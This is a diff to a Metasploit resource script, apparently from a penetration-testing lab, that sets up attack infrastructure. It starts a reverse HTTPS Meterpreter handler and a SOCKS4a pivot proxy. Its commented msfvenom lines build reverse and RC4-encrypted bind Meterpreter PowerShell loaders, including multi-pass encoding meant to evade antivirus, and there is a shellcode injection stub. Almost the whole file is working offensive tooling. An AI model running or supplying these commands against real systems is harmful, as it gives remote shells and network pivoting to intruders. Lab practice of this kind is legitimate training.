--- a/passing_and_injection/pivot.rc
+++ b/passing_and_injection/pivot.rc
@@ -1,33 +1,46 @@
+#### START MSFCONSOLE ####
 #msfconsole -r pivot.rc -q
 
+
+#### SSL PEM ####
 #openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout /tmp/rsaprivate.key -out /tmp/servercertificate.crt
 #cat /tmp/rsaprivate.key /tmp/servercertificate.crt > /root/rastalabs/msf.pem
 
-#msfvenom -p windows/meterpreter/reverse_winhttps LHOST=10.10.16.27 LPORT=443 --platform windows -a x86 HandlerSSLCert=./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > shellcode.raw
-#msfvenom --payload windows/x64/meterpreter/reverse_winhttps LHOST=tun0 HandlerSSLCert=/root/rastalabs/msf.pem StagerVerifySSLCert=true LPORT=443 -f psh-net -o 443.ps1
+
+#### psh-net loader ####
+#msfvenom --payload windows/x64/meterpreter/reverse_winhttps LHOST=tun0 LPORT=443 HandlerSSLCert=/root/rastalabs/msf.pem StagerVerifySSLCert=true -f psh-net -o 443.ps1
 
 
-#SESSION PASS
+#### PIVOTING AND PASSING SOCKS ####
 spool msf.log
 use exploit/multi/handler
 set payload windows/x64/meterpreter/reverse_winhttps
 set HandlerSSLCert /root/rastalabs/msf.pem
 set SessionCommunicationTimeout 600
 set LHOST tun0
-set AutoRunScript post/windows/manage/migrate
-
-#80 is covenant
 set LPORT 443
 set EXITFUNC thread
 set EXITONSESSION false
 exploit -j
+#### ENDING ####
 
 
-#SOCKS
+#### SOCKS4a ####
 use auxiliary/server/socks_proxy
 set VERSION 4a
 set SRVPORT 1080
 exploit -j
+#### ENDING ####
+
+
+#### RC4 ENC BIND####
+#msfvenom --payload windows/x64/meterpreter/bind_tcp_rc4 RC4PASSWORD=ayylmao_41i3n5 LPORT=8080 -f psh-net -o 8080_bind.ps1
+#use payload/windows/x64/meterpreter/bind_tcp_rc4
+#set EXITFUNC thread
+#set LPORT 8080
+#set RHOST 10.10.16.34
+#set RC4PASSWORD ayylmao_41i3n5
+#### ENDING ####
 
 
 #INJECT
@@ -37,12 +50,6 @@ exploit -j
 #set SESSION 1
 #set SHELLCODE /tmp/HTTPGrunt.bin
 #run
-
-
-
-#EXPLOITS
-#setg Proxies socks4:127.0.0.1:1080
-
 
 
 #Generate an x64 bind TCP Meterpreter payload using msfconsole or msfvenom and output to .ps1 using the psh-net format type.
